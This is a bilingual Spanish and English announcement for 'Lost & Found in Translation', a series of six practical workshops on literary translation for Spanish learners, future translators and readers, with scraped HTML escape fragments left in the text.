\"\"<\/a>Primera serie de 6 talleres<\/strong> que exploran el fascinante mundo de la traducci\u00f3n literaria<\/strong>, dirigidos a estudiantes de espa\u00f1ol de todos los niveles, futuros traductores o simplemente lectores de literatura en ingl\u00e9s y en espa\u00f1ol.<\/p>\n

Los talleres son m\u00e1s pr\u00e1cticos que te\u00f3ricos e incluyen una amplia muestra de autores de Espa\u00f1a y Am\u00e9rica latina, ejercicios de traducci\u00f3n, discusiones y debates.<\/p>\n

M\u00e1s que enfocar la traducci\u00f3n como un problema de dif\u00edcil soluci\u00f3n, la finalidad de este taller es la de poder disfrutar al reescribir en tu propia lengua los textos literarios de tus autores favoritos.<\/p>\n

Lost & Found in Translation<\/span><\/h2>\n

A series of 6 workshops exploring the fascinating art of literary translation, aimed at learners and students of Spanish at all levels, would-be translators, or simply readers of literature in English and Spanish.<\/span><\/p>\n

The workshops will be practical rather than theoretical, and will include sampling and ‘tasting’ a range of translated authors from Spain and Latin America, gentle exercises in translation, brain-teasers, discussion and debate, and plenty of opportunities to follow individual interests. Rather than seeing translation as problematic and rife with difficulty, the workshops will take a relaxed but purposeful approach to the challenges and joys of re-writing in your own language literary texts that you admire and enjoy.<\/span><\/p>\n
